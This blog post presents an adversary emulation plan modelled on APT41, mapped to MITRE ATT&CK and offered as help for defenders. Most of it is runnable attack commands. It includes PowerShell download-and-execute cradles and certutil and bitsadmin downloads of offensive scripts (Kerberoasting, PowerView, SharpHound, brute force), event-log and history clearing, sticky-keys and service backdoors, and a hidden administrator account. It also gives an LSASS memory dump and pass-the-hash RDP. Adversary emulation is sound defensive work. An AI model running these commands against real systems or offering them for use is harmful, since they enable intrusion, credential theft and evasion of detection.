APT41 Emulation Plan


I have recently blogged about hunting for techniques used by APT41, which only contains a few techniques. Since I wanted to expand this. I’ve decided to create an emulation plan for Blue Teamers.

The reason behind this blog post is mainly due to the fact, that I got inspired by MITRE Engenuity Center for Threat-Informed Defense (Center) for releasing their emulation plan of FIN6. This emulation plan can be found here

The set-up and layout of this blog post is inspired by MITRE Engenuity Center for Threat-Informed Defense (Center), so credits to them for providing such a great set-up.

APT41 is a group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity.

US says APT41 orchestrated intrusions at more than 100 companies across the world, ranging from software vendors, video gaming companies, telcos, and more.

Advanced Persistent Threat Groups (APT Groups) | FireEye


This emulation plan is based on public information that is available. Everything is provided in such a way that everyone is capable enough to execute it. All the information around the used techniques are coming from MITRE ATT&CK.

Source: https://attack.mitre.org/groups/G0096/

Keep in mind that it’s difficult to know exactly which steps were taken, so yes. I don’t claim that it’s the exact way on how the adversaries operate.

Step 1 – APT41 Initial Access

Usually they start with sending spear-phishing mails to their victims with an attachment, such as a compiled HTML file (.chm)

Step 2 – Discovery

Once the group has managed to obtain a foothold on a compromised machine. They are starting to use built-in Windows functionalities to perform reconnaissance to gather information about system & network configurations.


2.1 – System Owner/User Discovery (T1033)

Get username from victim machine


2.2 – System Network Configuration Discovery (T1016)

Get MAC address from victim machine

ipconfig /all

2.3 – System Network Connections Discovery (T1049)

List network connections to or from compromised system

# Shows all TCP connections with no DNS resolution (show IP addresses instead).

netstat -ant

# Displays the contents of the IP routing table. (This is equivalent to the route print command under Windows.)

netstat -r

2.4 – System Network Connections Discovery (T1049)

Enumerate active RDP sessions on local & remote host.

Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/Po
werView.ps1 -OutFile C:\Temp\PowerView.ps1

cd C:\Temp

Import-Module .\PowerView.ps1

# Return all active RDP sessions on localhost

# Return all active RDP sessions on Domain Controllers
Get-DomainController | Get-NetRDPSession

# Return all active RDP session on a remote server
Get-NetRDPSession -ComputerName "remoteserver"

2.5 – Network Share Discovery (T1135)

List shares on local & remote host.

# List all shares on local host
net share

# List all shares on remote host
net view \\remotesystem
Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/Po
werView.ps1 -OutFile C:\Temp\PowerView.ps1

cd C:\Temp

Import-Module .\PowerView.ps1

# Return active shares on local host

# Return active shares on remote host
Get-NetShare -ComputerName remoteserver

# Return all shares for every domain joined computer
Get-DomainComputer | Get-NetShare

2.6 – Network Service Scanning (T1046)

List all subnets in AD

# Use LDAP search filter to enumerate all subnets in AD
$ChildItems = ([ADSI]"LDAP://CN=Subnets,CN=Sites,CN=Configuration,DC=contoso,DC=com"); $ChildItems.psbase.Children | Format-Table name, Description, whenCreated

# Using .NET classes to enumerate all subnets in AD

2.7 – Domain Trust Discovery (T1482)

Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments.

nltest /domain_trusts > ad_trustdmp.txt

2.8 – Permission Groups Discovery: Domain Groups (T1069.002)

APT41 used the net.exe utility to enumerate the Domain Admins group.

net group "Domain Admins" /do

Step 3 – Execution

In this step, the adversaries are downloading and executing malware on the victim machine.

3.1 – Command and Scripting Interpreter: PowerShell (T1059.001)

FireEye has covered in their blog post that APT41 leveraged to PowerShell in order to download and execute their malware.

Source: https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html

Not the exact way, like APT41 did. But here is a similar way.

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"

3.2 – Windows Management Instrumentation (T1047)

APT41 used the WMIEXEC utility to execute whoami commands on remote machines.

Invoke-WebRequest https://raw.githubusercontent.com/OneScripter/WmiExec/master/WmiExec.ps1 -
OutFile C:\Temp\WmiExec.ps1

cd C:\Temp

.\WmiExec.ps1 -ComputerName remotesystem -Command "whoami"

Step 4 – Defense Evasion

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise.

4.1 – BITS Jobs (T1197)

Leveraging the Microsoft BITSAdmin command-line tool to download and install payloads

bitsadmin /transfer bbbb https://raw.githubusercontent.com/HarmJ0y/ASREPRoast/master/ASREPRoast.ps1 C:\Temp\ASREPRoast.ps1
# PowerShell version

powershell -windowstyle hidden -ExecutionPolicy ByPass -NoProfile Start-BitsTransfer -Source https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -Destination C:\Temp\Invoke-Kerberoast.ps1

4.2 – Indirect Command Execution (T1202)

APT41 used certutil to download additional files.

certutil -urlcache -split -f https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1 C:\Temp\SharpHound.ps1

4.3 – Indicator Removal on Host: Clear Windows Event Logs (T1070.001)

APT41 attempted to remove evidence of some of its activity by clearing Windows security and system events.

# Run CMD as admin

wevtutil cl security

wevtutil cl system

4.4 – Indicator Removal on Host: Clear Command History (T1070.003)

APT41 attempted to remove evidence of some of its activity by deleting Bash histories. (Linux related)

history -c

Step 5 – Persistence

Persistence consists of techniques that adversaries use to keep access to a victim system.

5.1 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001)

APT41 added a registry key in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost to establish persistence for Cobalt Strike.

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "StorSyncSvc" /t REG_MULTI_SZ /d "StorSyncSvc" /f

5.2 – Create or Modify System Process: Windows Service (T1543.003)

APT41 created the StorSyncSvc service to provide persistence for Cobalt Strike.

sc create "StorSyncSvc" binPath= "%SystemRoot%\system32\svchost.exe -k "StorSyncSvc" type= share start= auto error= ignore DisplayName= "StorSyncSvc"
# PowerShell version

New-Service -BinaryPathName C:\Windows\System32\cmd.exe -Name APT41 -DisplayName APT41 -StartupType Automatic

5.3 – Scheduled Task/Job: Scheduled Task (T1053.005)

APT41 used a compromised account to create a scheduled task on a system.

schtasks /create /tn "NotAVirus" /tr C:\Windows\System32\calc.exe /sc minute /mo 1

5.4 – Event Triggered Execution: Accessibility Features (T1546.008)

APT41 leveraged sticky keys to establish persistence.

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f

5.5 – Create Account: Local Account (T1136.001)

APT41 created user accounts and adds them to the User and Admin groups.

# Create local account
net user APT41 MyCrappyPassw0rd! /add

# Add local account to the Built-in Administrators group
net localgroup Administrators APT41 /add

5.6 – Windows Management Instrumentation (T1047)

APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence

# Run PowerShell as admin

Invoke-WebRequest https://raw.githubusercontent.com/subesp0x10/Wmi-Persistence/master/WMI-Pe
rsistence.ps1 -OutFile C:\Temp\WMI-Persistence.ps1

cd C:\Temp

Import-Module .\WMI-Persistence.ps1

Install-Persistence -Trigger Startup -Payload "c:\windows\system32\calc.exe"

6 – Credential Access

Credential Access consists of techniques for stealing credentials like account names and passwords

6.1 – OS Credential Dumping: LSASS Memory (T1003.001)

Dumping password hashes from memory

# Run PowerShell as admin

Get-Process lsass

.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 752 C:\temp\lsass.dmp full

6.2Brute Force: Password Cracking (T1110.002)

APT41 performed password brute-force attacks on the local admin (RID-500) account.

Invoke-WebRequest https://raw.githubusercontent.com/samratashok/nishang/master/Scan/Invoke-B
ruteForce.ps1 -OutFile C:\Temp\Invoke-BruteForce.ps1

cd C:\Temp

Import-Module .\Invoke-BruteForce.ps1

Invoke-BruteForce -ComputerName victimmachine -UserList C:\Temp\users.txt -PasswordList C:\Temp\wordlist.txt -Service LocalAccounts -StopOnSuccess -Verbose

7 – Lateral Movement

Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network.

7.1 – Remote Services: Remote Desktop Protocol (T1021.001)

APT41 used RDP for lateral movement.

In order to perform such attack. It’s possible to use the xfreeRDP. This is a Linux built-in Linux utility.

This only works on:

  • Windows Server 2012 R2
  • Windows 8.1

Restricted Admin Mode also needs to be enabled on the target systems, but it’s nothing more than a registry key flip.

xfreerdp /u:admin /d:. /pth:hash:hash /v:TARGET






3 thoughts on “APT41 Emulation Plan

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: